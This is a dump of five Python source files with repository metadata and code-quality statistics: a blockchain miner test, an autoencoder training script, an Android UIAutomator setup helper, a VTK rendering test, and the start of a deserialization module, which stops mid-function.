Dataset schema, 113 columns (name: dtype):

hexsha: string | size: int64 | ext: string | lang: string
max_stars_repo_path: string | max_stars_repo_name: string | max_stars_repo_head_hexsha: string | max_stars_repo_licenses: list | max_stars_count: int64 | max_stars_repo_stars_event_min_datetime: string | max_stars_repo_stars_event_max_datetime: string
max_issues_repo_path: string | max_issues_repo_name: string | max_issues_repo_head_hexsha: string | max_issues_repo_licenses: list | max_issues_count: int64 | max_issues_repo_issues_event_min_datetime: string | max_issues_repo_issues_event_max_datetime: string
max_forks_repo_path: string | max_forks_repo_name: string | max_forks_repo_head_hexsha: string | max_forks_repo_licenses: list | max_forks_count: int64 | max_forks_repo_forks_event_min_datetime: string | max_forks_repo_forks_event_max_datetime: string
content: string | avg_line_length: float64 | max_line_length: int64 | alphanum_fraction: float64
qsc_code_*_quality_signal columns (float64 unless noted): num_words (int64), num_chars, mean_word_length, frac_words_unique, frac_chars_top_2grams, frac_chars_top_3grams, frac_chars_top_4grams, frac_chars_dupe_5grams, frac_chars_dupe_6grams, frac_chars_dupe_7grams, frac_chars_dupe_8grams, frac_chars_dupe_9grams, frac_chars_dupe_10grams, frac_chars_replacement_symbols, frac_chars_digital, frac_chars_whitespace, size_file_byte, num_lines, num_chars_line_max, num_chars_line_mean, frac_chars_alphabet, frac_chars_comments, cate_xml_start, frac_lines_dupe_lines, cate_autogen, frac_lines_long_string, frac_chars_string_length, frac_chars_long_word_length, frac_lines_string_concat, cate_encoded_data, frac_chars_hex_words, frac_lines_prompt_comments, frac_lines_assert
qsc_codepython_*_quality_signal columns (float64 unless noted): cate_ast, frac_lines_func_ratio, cate_var_zero (bool), frac_lines_pass, frac_lines_import, frac_lines_simplefunc, score_lines_no_logic, frac_lines_print
qsc_code_* / qsc_codepython_* counterparts without the _quality_signal suffix: same names as above, typed int64 (except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null-typed)
effective: string | hits: int64
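The schema above is easiest to handle programmatically. Below is a minimal sketch of loading one shard of such a dump and inspecting these columns, assuming the rows are stored as Parquet under a local file named code_shard.parquet; both the file name and the storage format are assumptions for illustration, not something this dump specifies.

```python
import pandas as pd

# Hypothetical shard file; the actual storage layout is not given in this dump.
df = pd.read_parquet("code_shard.parquet")

# Identity and size columns.
print(df[["hexsha", "size", "ext", "lang", "max_stars_count"]].head())

# All quality-signal columns share the `_quality_signal` suffix.
signal_cols = [c for c in df.columns if c.endswith("_quality_signal")]
print(len(signal_cols), "quality-signal columns")

# Example: comment density and duplicate-line fraction per file.
print(df[["max_stars_repo_path",
          "qsc_code_frac_chars_comments_quality_signal",
          "qsc_code_frac_lines_dupe_lines_quality_signal"]].head())
```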
Record 1
hexsha: 132f2f1fcc81be862b19147ccbf0e1ac78045127 | size: 8,995 | ext: py | lang: Python
max_stars_repo: path quarkchain/cluster/tests/test_miner.py | name TahiG/pyquarkchain | head_hexsha 30da626ef6b50bd07b230aac05a3cef7fd7f23cf | licenses ["MIT"] | max_stars_count 17 | stars_event 2018-12-25T03:41:25.000Z to 2020-08-11T06:06:26.000Z
max_issues_repo: path quarkchain/cluster/tests/test_miner.py | name TahiG/pyquarkchain | head_hexsha 30da626ef6b50bd07b230aac05a3cef7fd7f23cf | licenses ["MIT"] | max_issues_count null | issues_event null to null
max_forks_repo: path quarkchain/cluster/tests/test_miner.py | name TahiG/pyquarkchain | head_hexsha 30da626ef6b50bd07b230aac05a3cef7fd7f23cf | licenses ["MIT"] | max_forks_count 5 | forks_event 2018-12-25T07:55:56.000Z to 2019-09-11T23:19:59.000Z
content:
```python
import asyncio
import time
import unittest
from typing import Optional
from quarkchain.cluster.miner import DoubleSHA256, Miner, MiningWork, validate_seal
from quarkchain.config import ConsensusType
from quarkchain.core import RootBlock, RootBlockHeader
from quarkchain.p2p import ecies
from quarkchain.utils import sha3_256
class TestMiner(unittest.TestCase):
def setUp(self):
super().setUp()
def miner_gen(consensus, create_func, add_func, **kwargs):
m = Miner(
consensus, create_func, add_func, self.get_mining_params, **kwargs
)
m.enabled = True
return m
self.miner_gen = miner_gen
self.added_blocks = []
@staticmethod
def get_mining_params(rounds: Optional[int] = None):
# guarantee target time is hit
ret = {"target_block_time": 0.0, "is_test": True}
if rounds is not None:
ret["rounds"] = rounds
return ret
def test_mine_new_block_normal_case(self):
async def create(retry=True):
if len(self.added_blocks) >= 5:
return None # stop the game
return RootBlock(
RootBlockHeader(create_time=int(time.time())),
tracking_data="{}".encode("utf-8"),
)
async def add(block):
nonlocal miner
self.added_blocks.append(block)
for consensus in (
ConsensusType.POW_SIMULATE,
ConsensusType.POW_ETHASH,
ConsensusType.POW_SHA3SHA3,
):
miner = self.miner_gen(consensus, create, add)
# should generate 5 blocks and then end
loop = asyncio.get_event_loop()
loop.run_until_complete(miner._mine_new_block_async())
self.assertEqual(len(self.added_blocks), 5)
def test_simulate_mine_handle_block_exception(self):
i = 0
async def create(retry=True):
nonlocal i
if i >= 5:
return None
return RootBlock(
RootBlockHeader(create_time=int(time.time())),
tracking_data="{}".encode("utf-8"),
)
async def add(block):
nonlocal i, miner
try:
if i % 2 == 0:
raise Exception("(╯°□°)╯︵ ┻━┻")
else:
self.added_blocks.append(block)
finally:
i += 1
miner = self.miner_gen(ConsensusType.POW_SIMULATE, create, add)
# only 2 blocks can be added
loop = asyncio.get_event_loop()
loop.run_until_complete(miner._mine_new_block_async())
self.assertEqual(len(self.added_blocks), 2)
def test_sha3sha3(self):
miner = self.miner_gen(ConsensusType.POW_SHA3SHA3, None, None)
block = RootBlock(
RootBlockHeader(create_time=42, difficulty=5),
tracking_data="{}".encode("utf-8"),
)
work = MiningWork(block.header.get_hash_for_mining(), 42, 5)
# only process one block, which is passed in. `None` means termination right after
miner.input_q.put((None, {}))
miner.mine_loop(
work,
{"consensus_type": ConsensusType.POW_SHA3SHA3},
miner.input_q,
miner.output_q,
)
mined_res = miner.output_q.get()
block.header.nonce = mined_res.nonce
validate_seal(block.header, ConsensusType.POW_SHA3SHA3)
def test_qkchash(self):
miner = self.miner_gen(ConsensusType.POW_QKCHASH, None, None)
block = RootBlock(
RootBlockHeader(create_time=42, difficulty=5),
tracking_data="{}".encode("utf-8"),
)
work = MiningWork(block.header.get_hash_for_mining(), 42, 5)
# only process one block, which is passed in. `None` means termination right after
miner.input_q.put((None, {}))
miner.mine_loop(
work,
{"consensus_type": ConsensusType.POW_QKCHASH},
miner.input_q,
miner.output_q,
)
mined_res = miner.output_q.get()
block.header.nonce = mined_res.nonce
block.header.mixhash = mined_res.mixhash
validate_seal(block.header, ConsensusType.POW_QKCHASH)
def test_only_remote(self):
async def go():
miner = self.miner_gen(ConsensusType.POW_SHA3SHA3, None, None)
with self.assertRaises(ValueError):
await miner.get_work()
with self.assertRaises(ValueError):
await miner.submit_work(b"", 42, b"")
loop = asyncio.get_event_loop()
loop.run_until_complete(go())
def test_get_work(self):
now = 42
async def create(retry=True):
nonlocal now
return RootBlock(RootBlockHeader(create_time=now, extra_data=b"{}"))
miner = self.miner_gen(ConsensusType.POW_SHA3SHA3, create, None, remote=True)
async def go():
nonlocal now
# no current work, will generate a new one
work = await miner.get_work(now=now)
self.assertEqual(len(work), 3)
self.assertEqual(len(miner.work_map), 1)
h = list(miner.work_map.keys())[0]
self.assertEqual(work.hash, h)
# cache hit
now += 1
work = await miner.get_work(now=now)
self.assertEqual(work.hash, h)
self.assertEqual(len(miner.work_map), 1)
# new work if interval passed
now += 10
work = await miner.get_work(now=now)
self.assertEqual(len(miner.work_map), 2)
self.assertNotEqual(work.hash, h)
# work map cleaned up if too much time passed
now += 100
await miner.get_work(now=now)
self.assertEqual(len(miner.work_map), 1) # only new work itself
loop = asyncio.get_event_loop()
loop.run_until_complete(go())
def test_submit_work(self):
now = 42
block = RootBlock(
RootBlockHeader(create_time=42, extra_data=b"{}", difficulty=5)
)
async def create(retry=True):
return block
async def add(block_to_add):
self.added_blocks.append(block_to_add)
miner = self.miner_gen(ConsensusType.POW_SHA3SHA3, create, add, remote=True)
async def go():
work = await miner.get_work(now=now)
self.assertEqual(work.height, 0)
self.assertEqual(work.difficulty, 5)
# submitted block doesn't exist
res = await miner.submit_work(b"lolwut", 0, sha3_256(b""))
self.assertFalse(res)
solver = DoubleSHA256(work)
sol = solver.mine(100, 200).nonce
self.assertGreater(sol, 100) # ensure non-solution is tried
non_sol = sol - 1
# invalid pow proof
res = await miner.submit_work(work.hash, non_sol, sha3_256(b""))
self.assertFalse(res)
# valid submission, also check internal state afterwards
res = await miner.submit_work(work.hash, sol, sha3_256(b""))
self.assertTrue(res)
self.assertEqual(miner.work_map, {})
self.assertEqual(len(self.added_blocks), 1)
self.assertIsNone(miner.current_work)
loop = asyncio.get_event_loop()
loop.run_until_complete(go())
def test_submit_work_with_guardian(self):
now = 42
block = RootBlock(
RootBlockHeader(create_time=42, extra_data=b"{}", difficulty=1000)
)
async def create(retry=True):
return block
async def add(_):
pass
miner = self.miner_gen(
ConsensusType.POW_SHA3SHA3,
create,
add,
remote=True,
# fake pk, will succeed in test but fail in real world when
# adding the block to the root chain
guardian_private_key=ecies.generate_privkey(),
)
async def go():
for i in range(42, 100):
work = await miner.get_work(now=now)
self.assertEqual(work.height, 0)
# guardian: diff 1000 -> 1, any number should work
res = await miner.submit_work(work.hash, i, sha3_256(b""))
self.assertTrue(res)
loop = asyncio.get_event_loop()
loop.run_until_complete(go())
def test_validate_seal_with_adjusted_diff(self):
diff = 1000
block = RootBlock(
RootBlockHeader(create_time=42, difficulty=diff),
tracking_data="{}".encode("utf-8"),
)
block.header.nonce = 0
with self.assertRaises(ValueError):
validate_seal(block.header, ConsensusType.POW_SHA3SHA3)
# significantly lowering the diff should pass
validate_seal(block.header, ConsensusType.POW_SHA3SHA3, adjusted_diff=1)
```
avg_line_length: 35 | max_line_length: 90 | alphanum_fraction: 0.585103
Quality signals (qsc_code_*_quality_signal):
  num_words: 1,053 | num_chars: 8,995 | mean_word_length: 4.831909 | frac_words_unique: 0.202279
  frac_chars_top_2grams: 0.050314 | frac_chars_top_3grams: 0.04717 | frac_chars_top_4grams: 0.053459
  frac_chars_dupe_5grams: 0.617728 | dupe_6grams: 0.551887 | dupe_7grams: 0.483294 | dupe_8grams: 0.40684 | dupe_9grams: 0.397602 | dupe_10grams: 0.379914
  frac_chars_replacement_symbols: 0 | frac_chars_digital: 0.02285 | frac_chars_whitespace: 0.318844
  size_file_byte: 8,995 | num_lines: 256 | num_chars_line_max: 91 | num_chars_line_mean: 35.136719
  frac_chars_alphabet: 0.806104 | frac_chars_comments: 0.081267 | cate_xml_start: 0 | frac_lines_dupe_lines: 0.450495 | cate_autogen: 0
  frac_lines_long_string: 0 | frac_chars_string_length: 0.014192 | frac_chars_long_word_length: 0 | frac_lines_string_concat: 0 | cate_encoded_data: 0
  frac_chars_hex_words: 0 | frac_lines_prompt_comments: 0 | frac_lines_assert: 0.118812
Python signals (qsc_codepython_*_quality_signal):
  cate_ast: 1 | frac_lines_func_ratio: 0.059406 | cate_var_zero: false | frac_lines_pass: 0.004951 | frac_lines_import: 0.044554 | frac_lines_simplefunc: 0 | score_lines_no_logic: 0.153465 | frac_lines_print: 0
Unsuffixed qsc_code_* / qsc_codepython_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat (null)
effective: 1 | hits: 0
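Most of the per-file statistics in the block above can be recomputed directly from the content field. The sketch below shows one plausible way to derive a few of them; the exact definitions behind the published numbers (for example, whether blank lines are counted, or whether unittest-style self.assert* calls count toward frac_lines_assert) are not stated in this dump, so treat it as illustrative rather than a reference implementation.

```python
def simple_signals(content: str) -> dict:
    """Recompute a handful of per-file statistics from a raw source string.

    The keys mirror the column names above, but the exact counting rules
    behind the published qsc_* values are assumed, not known.
    """
    lines = content.splitlines()
    n_lines = max(len(lines), 1)
    n_chars = max(len(content), 1)
    return {
        "qsc_code_num_lines_quality_signal": len(lines),
        "qsc_code_size_file_byte_quality_signal": len(content.encode("utf-8")),
        "qsc_code_num_chars_line_max_quality_signal": max((len(l) for l in lines), default=0),
        "qsc_code_num_chars_line_mean_quality_signal": n_chars / n_lines,
        "qsc_code_frac_chars_whitespace_quality_signal": sum(c.isspace() for c in content) / n_chars,
        "qsc_code_frac_lines_assert_quality_signal": sum(
            l.lstrip().startswith(("assert", "self.assert")) for l in lines
        ) / n_lines,
    }
```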
Record 2
hexsha: 133006e28697a9c060805e03e6080858eb027007 | size: 4,782 | ext: py | lang: Python
repo path: analysis/networks/autoencoder/train_eval.py | repo name: nriesterer/iccm-neural-bound | head_hexsha: e14b103ba2c81a197de5b0edf948c19d57f0d3ba | licenses: ["MIT"] (identical across the max_stars, max_issues and max_forks groups)
max_stars_count, max_issues_count, max_forks_count and all star/issue/fork event datetimes: null
content:
```python
""" Evaluates the training performance of the autoencoder.
"""
import time
import pandas as pd
import numpy as np
import torch
import torch.optim as optim
import torch.nn as nn
import ccobra
import onehot
import autoencoder
# General settings
training_datafile = '../../data/Ragni-train.csv'
test_datafile = '../../data/Ragni-test.csv'
n_epochs = 150
batch_size = 16
net = autoencoder.DenoisingAutoencoder()
criterion = nn.MSELoss()
optimizer = optim.Adam(net.parameters())
def csv_to_tensor(datafile):
profiles = []
response_dicts = []
task_sequences = []
df = pd.read_csv(datafile)
for _, subj_df in df.groupby('id'):
# Obtain the task-response mapping for all syllogisms
response_dict = {}
task_sequence = []
for _, task_series in subj_df.sort_values('sequence').iterrows():
item = ccobra.Item(
task_series['id'], task_series['domain'], task_series['task'],
task_series['response_type'], task_series['choices'], task_series['sequence'])
syllogism = ccobra.syllogistic.Syllogism(item)
response_dict[syllogism.encoded_task] = syllogism.encode_response(
task_series['response'].split(';'))
task_sequence.append(syllogism.encoded_task)
# Convert the task-response mapping to the reasoner profile
profile = []
for task in ccobra.syllogistic.SYLLOGISMS:
profile.append(onehot.onehot_response(response_dict[task]))
profiles.append(profile)
response_dicts.append(response_dict)
task_sequences.append(task_sequence)
profile_tensor = torch.tensor(profiles).float().view(-1, 576)
return profile_tensor, np.array(response_dicts), np.array(task_sequences)
# Construct the training and test tensors
train_data, train_resp_dicts, train_seqs = csv_to_tensor(training_datafile)
test_data, test_resp_dicts, test_seqs = csv_to_tensor(test_datafile)
def compute_accuracy(data, resp_dicts, seqs):
accs = []
for subj_idx in range(len(data)):
subj_resp_dict = resp_dicts[subj_idx]
subj_seq = seqs[subj_idx]
profile_tensor = torch.zeros((576)).float()
subj_hits = []
for task in subj_seq:
task_idx = ccobra.syllogistic.SYLLOGISMS.index(task)
start = task_idx * 9
end = start + 9
truth = subj_resp_dict[task]
# Query the network for a prediction
prediction_idx = net(profile_tensor)[start:end].argmax()
prediction = ccobra.syllogistic.RESPONSES[prediction_idx]
subj_hits.append(prediction == truth)
# Add the true response to the profile
profile_tensor[start:end] = torch.from_numpy(onehot.onehot_response(truth))
accs.append(subj_hits)
return accs
# Training loop
train_accs = []
test_accs = []
losses = []
for epoch in range(n_epochs):
start_time = time.time()
# Permute the training data
rnd_idxs = np.random.permutation(np.arange(len(train_data)))
train_data = train_data[rnd_idxs]
train_resp_dicts = train_resp_dicts[rnd_idxs]
train_seqs = train_seqs[rnd_idxs]
batch_losses = []
for batch_idx in range(len(train_data) // batch_size):
# Obtain the batch data
start = batch_idx * batch_size
end = start + batch_size
batch_data = train_data[start:end]
input_data = batch_data
# Augment the input data by adding noise
noise = torch.bernoulli(torch.zeros_like(input_data) + 0.8)
input_data = input_data * noise
# Perform the training
outputs = net(input_data)
loss = criterion(outputs, batch_data)
optimizer.zero_grad()
loss.backward()
optimizer.step()
batch_losses.append(loss.item())
losses.append(np.mean(batch_losses))
# Compute the accuracies for evaluation
net.eval()
# Compute the overall accuracy on the training dataset
train_acc = compute_accuracy(train_data, train_resp_dicts, train_seqs)
test_acc = compute_accuracy(test_data, test_resp_dicts, test_seqs)
# Diagnostig output
print('Epoch {}/{} ({:.2f}s): {}'.format(
epoch + 1, n_epochs, time.time() - start_time, np.mean(batch_losses)))
print(' train acc: {:.4f} ({:.4f})'.format(np.mean(train_acc), np.std(train_acc)))
print(' test acc : {:.4f} ({:.4f})'.format(np.mean(test_acc), np.std(test_acc)))
# Store the accuracy results
train_accs.append(train_acc)
test_accs.append(test_acc)
# Write the accuracies to disk
print('Writing the results to disk...')
np.save('train_accs.npy', np.array(train_accs))
np.save('test_accs.npy', np.array(test_accs))
np.save('train_losses.npy', np.array(losses))
```
avg_line_length: 32.310811 | max_line_length: 94 | alphanum_fraction: 0.669385
Quality signals (qsc_code_*_quality_signal):
  num_words: 623 | num_chars: 4,782 | mean_word_length: 4.908507 | frac_words_unique: 0.255217
  frac_chars_top_2grams: 0.026161 | frac_chars_top_3grams: 0.018313 | frac_chars_top_4grams: 0.01864
  frac_chars_dupe_5grams: 0.052322 | dupe_6grams: 0.052322 | dupe_7grams: 0.039895 | dupe_8grams: 0 | dupe_9grams: 0 | dupe_10grams: 0
  frac_chars_replacement_symbols: 0 | frac_chars_digital: 0.005901 | frac_chars_whitespace: 0.22041
  size_file_byte: 4,782 | num_lines: 147 | num_chars_line_max: 95 | num_chars_line_mean: 32.530612
  frac_chars_alphabet: 0.814378 | frac_chars_comments: 0.121497 | cate_xml_start: 0 | frac_lines_dupe_lines: 0 | cate_autogen: 0
  frac_lines_long_string: 0 | frac_chars_string_length: 0.063682 | frac_chars_long_word_length: 0.01221 | frac_lines_string_concat: 0 | cate_encoded_data: 0
  frac_chars_hex_words: 0 | frac_lines_prompt_comments: 0 | frac_lines_assert: 0
Python signals (qsc_codepython_*_quality_signal):
  cate_ast: 1 | frac_lines_func_ratio: 0.020619 | cate_var_zero: false | frac_lines_pass: 0 | frac_lines_import: 0.092784 | frac_lines_simplefunc: 0 | score_lines_no_logic: 0.134021 | frac_lines_print: 0.041237
Unsuffixed qsc_code_* / qsc_codepython_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat (null)
effective: 1 | hits: 0
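In practice these signals are the handles used to filter a code corpus. Below is a short sketch of one plausible filter, reusing the df loaded in the earlier sketch; the thresholds are illustrative assumptions, not values prescribed anywhere in this dump.

```python
# Illustrative quality filter over the qsc_* columns; every threshold here is arbitrary.
mask = (
    (df["qsc_codepython_cate_ast_quality_signal"] == 1)             # parses as Python
    & (df["qsc_code_cate_autogen_quality_signal"] == 0)             # not flagged as auto-generated
    & (df["qsc_code_frac_chars_dupe_10grams_quality_signal"] < 0.5) # limit repeated 10-gram content
    & (df["qsc_code_num_chars_line_max_quality_signal"] < 1000)     # no extremely long lines
)
filtered = df[mask]
print(len(filtered), "of", len(df), "rows kept")
```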
Record 3
hexsha: 13319b518cfc2b51d7dc1b3515004faa2aab4919 | size: 2,170 | ext: py | lang: Python
max_stars_repo: path Tools/GAutomator/wpyscripts/uiautomator/uiautomator_manager.py | name Aver58/ColaFrameWork | head_hexsha 04c6750305ad734b30eceb95b463695b8373845a | licenses ["MIT"] | max_stars_count 1 | stars_event 2020-12-30T00:33:31.000Z to 2020-12-30T00:33:31.000Z
max_issues_repo: path Tools/GAutomator/wpyscripts/uiautomator/uiautomator_manager.py | name wtb521thl/ColaFrameWork | head_hexsha 0a8cc589740e045ebde668a76c4a35366b38e62e | licenses ["MIT"] | max_issues_count null | issues_event null to null
max_forks_repo: path Tools/GAutomator/wpyscripts/uiautomator/uiautomator_manager.py | name wtb521thl/ColaFrameWork | head_hexsha 0a8cc589740e045ebde668a76c4a35366b38e62e | licenses ["MIT"] | max_forks_count 1 | forks_event 2020-07-27T12:28:56.000Z to 2020-07-27T12:28:56.000Z
content:
```python
#-*- coding: UTF-8 -*-
"""
Tencent is pleased to support the open source community by making GAutomator available.
Copyright (C) 2016 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
"""
__author__ = 'minhuaxu wukenaihesos@gmail.com'
import time
import os
import logging
from libs.uiauto.uiautomator import AutomatorDevice
from wpyscripts.common.adb_process import AdbTool
logger=logging.getLogger("wetest")
_device_port=9008
_uiautomator_port = os.environ.get("UIAUTOMATOR_PORT","19008")
def _init_uiautomator():
"""
初始化uiautomator
:return:
"""
file_path = os.path.split(os.path.realpath(__file__))[0]
uiautomator_stub_path = os.path.abspath(
os.path.join(file_path, "..","third","libs","uiAutomator","uiautomator-stub.jar"))
adb=AdbTool()
print(adb.cmd_wait("push",uiautomator_stub_path,"/data/local/tmp"))
logger.debug("Start UIAutomator")
uiautomator_process=adb.cmd("shell","uiautomator","runtest","uiautomator-stub.jar","-c","com.github.uiautomatorstub.Stub")
time.sleep(3)
logger.debug("Exit uiautomator")
adb.forward(_uiautomator_port,_device_port)
def _init():
port = os.environ.get("UIAUTOMATORPORT")
if port:
return int(port)
else:
"""
本地,初始化UiAutomator
"""
_init_uiautomator()
return int(_uiautomator_port)
def get_uiautomator():
if get_uiautomator.instance:
return get_uiautomator.instance
else:
port=_init()
get_uiautomator.instance = AutomatorDevice(None, port, os.environ.get("PLATFORM_IP", "127.0.0.1"), None)
return get_uiautomator.instance
get_uiautomator.instance=None
```
avg_line_length: 35 | max_line_length: 305 | alphanum_fraction: 0.723502
Quality signals (qsc_code_*_quality_signal):
  num_words: 283 | num_chars: 2,170 | mean_word_length: 5.402827 | frac_words_unique: 0.519435
  frac_chars_top_2grams: 0.064094 | frac_chars_top_3grams: 0.071942 | frac_chars_top_4grams: 0.031393
  frac_chars_dupe_5grams: 0 | dupe_6grams: 0 | dupe_7grams: 0 | dupe_8grams: 0 | dupe_9grams: 0 | dupe_10grams: 0
  frac_chars_replacement_symbols: 0 | frac_chars_digital: 0.013304 | frac_chars_whitespace: 0.168664
  size_file_byte: 2,170 | num_lines: 61 | num_chars_line_max: 306 | num_chars_line_mean: 35.57377
  frac_chars_alphabet: 0.834257 | frac_chars_comments: 0.323963 | cate_xml_start: 0 | frac_lines_dupe_lines: 0.114286 | cate_autogen: 0
  frac_lines_long_string: 0 | frac_chars_string_length: 0.189209 | frac_chars_long_word_length: 0.03813 | frac_lines_string_concat: 0 | cate_encoded_data: 0
  frac_chars_hex_words: 0 | frac_lines_prompt_comments: 0 | frac_lines_assert: 0
Python signals (qsc_codepython_*_quality_signal):
  cate_ast: 1 | frac_lines_func_ratio: 0.085714 | cate_var_zero: false | frac_lines_pass: 0 | frac_lines_import: 0.142857 | frac_lines_simplefunc: 0 | score_lines_no_logic: 0.342857 | frac_lines_print: 0.028571
Unsuffixed qsc_code_* / qsc_codepython_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat (null)
effective: 1 | hits: 0
Record 4
hexsha: 1334b7e4ac98033a8f1ce868857f5028fcae2b7d | size: 2,261 | ext: py | lang: Python
repo path: IMU/VTK-6.2.0/Filters/Core/Testing/Python/TestSynchronizedTemplates3D.py | repo name: timkrentz/SunTracker | head_hexsha: 9a189cc38f45e5fbc4e4c700d7295a871d022795 | licenses: ["MIT"] (identical across the max_stars, max_issues and max_forks groups)
max_stars_count, max_issues_count, max_forks_count and all star/issue/fork event datetimes: null
content:
```python
#!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
class TestSynchronizedTemplates3D(Testing.vtkTest):
def testAll(self):
reader = vtk.vtkImageReader()
reader.SetDataByteOrderToLittleEndian()
reader.SetDataExtent(0,63,0,63,1,93)
reader.SetDataSpacing(3.2,3.2,1.5)
reader.SetFilePrefix("" + str(VTK_DATA_ROOT) + "/Data/headsq/quarter")
reader.SetDataMask(0x7fff)
# write isosurface to file
#vtkSynchronizedTemplates3D stemp
stemp = vtk.vtkContourFilter()
stemp.SetInputConnection(reader.GetOutputPort())
stemp.SetValue(0,1150)
stemp.GenerateTrianglesOff()
stemp.Update()
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfPoints(),39315)
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfCells(),38380)
stemp.GenerateTrianglesOn()
stemp.Update()
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfPoints(),39315)
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfCells(),78268)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(stemp.GetOutputPort())
mapper.ScalarVisibilityOff()
head = vtk.vtkActor()
head.SetMapper(mapper)
head.GetProperty().SetColor(1,0.7,0.6)
# Create the RenderWindow, Renderer and Interactor
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
#
ren1.AddActor(head)
ren1.SetBackground(1,1,1)
renWin.SetSize(400,400)
ren1.SetBackground(0.5,0.5,0.6)
ren1.GetActiveCamera().SetPosition(99.8847,537.926,15)
ren1.GetActiveCamera().SetFocalPoint(99.8847,109.81,15)
ren1.GetActiveCamera().SetViewAngle(20)
ren1.GetActiveCamera().SetViewUp(0,0,-1)
ren1.ResetCameraClippingRange()
# render the image
#
renWin.Render()
# prevent the tk window from showing up then start the event loop
# --- end of script --
if __name__ == "__main__":
Testing.main([(TestSynchronizedTemplates3D, 'test')])
```
avg_line_length: 35.888889 | max_line_length: 81 | alphanum_fraction: 0.707651
Quality signals (qsc_code_*_quality_signal):
  num_words: 244 | num_chars: 2,261 | mean_word_length: 6.508197 | frac_words_unique: 0.504098
  frac_chars_top_2grams: 0.047859 | frac_chars_top_3grams: 0.060453 | frac_chars_top_4grams: 0.108312
  frac_chars_dupe_5grams: 0.172544 | dupe_6grams: 0.172544 | dupe_7grams: 0.172544 | dupe_8grams: 0.172544 | dupe_9grams: 0.172544 | dupe_10grams: 0.172544
  frac_chars_replacement_symbols: 0 | frac_chars_digital: 0.059517 | frac_chars_whitespace: 0.175144
  size_file_byte: 2,261 | num_lines: 62 | num_chars_line_max: 82 | num_chars_line_mean: 36.467742
  frac_chars_alphabet: 0.791957 | frac_chars_comments: 0.127377 | cate_xml_start: 0 | frac_lines_dupe_lines: 0.086957 | cate_autogen: 0
  frac_lines_long_string: 0 | frac_chars_string_length: 0.016842 | frac_chars_long_word_length: 0 | frac_lines_string_concat: 0 | cate_encoded_data: 0
  frac_chars_hex_words: 0.003158 | frac_lines_prompt_comments: 0 | frac_lines_assert: 0
Python signals (qsc_codepython_*_quality_signal):
  cate_ast: 1 | frac_lines_func_ratio: 0.021739 | cate_var_zero: false | frac_lines_pass: 0 | frac_lines_import: 0.065217 | frac_lines_simplefunc: 0 | score_lines_no_logic: 0.108696 | frac_lines_print: 0
Unsuffixed qsc_code_* / qsc_codepython_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat (null)
effective: 1 | hits: 0
Record 5
hexsha: 1335259eff2620253efdbb6cb8199b32e7ccadf8 | size: 14,913 | ext: py | lang: Python
repo path: deserialize/__init__.py | repo name: iAndriy/deserialize | head_hexsha: 3552517873d68d3bb953b44dd9512f0e0d045191 | licenses: ["MIT"] (identical across the max_stars, max_issues and max_forks groups)
max_stars_count, max_issues_count, max_forks_count and all star/issue/fork event datetimes: null
content:
```python
"""A module for deserializing data to Python objects."""
# pylint: disable=unidiomatic-typecheck
# pylint: disable=protected-access
# pylint: disable=too-many-branches
# pylint: disable=wildcard-import
import enum
import functools
import typing
from typing import Any, Callable, Dict, List, Optional, Union
from deserialize.conversions import camel_case, pascal_case
from deserialize.decorators import constructed, _call_constructed
from deserialize.decorators import default, _get_default, _has_default
from deserialize.decorators import (
downcast_field,
_get_downcast_field,
downcast_identifier,
_get_downcast_class,
allow_downcast_fallback,
_allows_downcast_fallback,
)
from deserialize.decorators import ignore, _should_ignore
from deserialize.decorators import key, _get_key
from deserialize.decorators import parser, _get_parser
from deserialize.decorators import auto_snake, _uses_auto_snake
from deserialize.decorators import allow_unhandled, _should_allow_unhandled
from deserialize.exceptions import (
DeserializeException,
InvalidBaseTypeException,
NoDefaultSpecifiedException,
UndefinedDowncastException,
UnhandledFieldException,
)
from deserialize.type_checks import *
class RawStorageMode(enum.Enum):
"""The storage mode for the raw data on each object.
If a store mode is set, the data will be stored in the attribute named:
`__deserialize_raw__`
"""
# Do not store the raw data at all
none = "none"
# Only store the data on the root node
root = "root"
# Store on all objects (WARNING: This can use a significant amount of memory)
all = "all"
def child_mode(self) -> "RawStorageMode":
"""Determine the mode for child parsing.
When we move to the next child iteration, we need to change mode
in some cases. For instance, if we only store the root node, then we
need to set all the children to not be stored.
:raises Exception: If we get an unexpected storage mode
:returns: The child raw storage mode
"""
if self == RawStorageMode.none:
return RawStorageMode.none
if self == RawStorageMode.root:
return RawStorageMode.none
if self == RawStorageMode.all:
return RawStorageMode.all
raise DeserializeException(f"Unexpected raw storage mode: {self}")
# pylint: disable=function-redefined
def deserialize(class_reference, data, *, throw_on_unhandled: bool = False, raw_storage_mode: RawStorageMode = RawStorageMode.none): # type: ignore
"""Deserialize data to a Python object."""
if not isinstance(data, dict) and not isinstance(data, list):
raise InvalidBaseTypeException(
"Only lists and dictionaries are supported as base raw data types"
)
if hasattr(class_reference, "__name__"):
name = class_reference.__name__
else:
name = str(class_reference)
return _deserialize(
class_reference,
data,
name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
# pylint: enable=function-redefined
# pylint:disable=too-many-return-statements
def _deserialize(
class_reference, data, debug_name, *, throw_on_unhandled: bool, raw_storage_mode: RawStorageMode
):
"""Deserialize data to a Python object, but allow base types"""
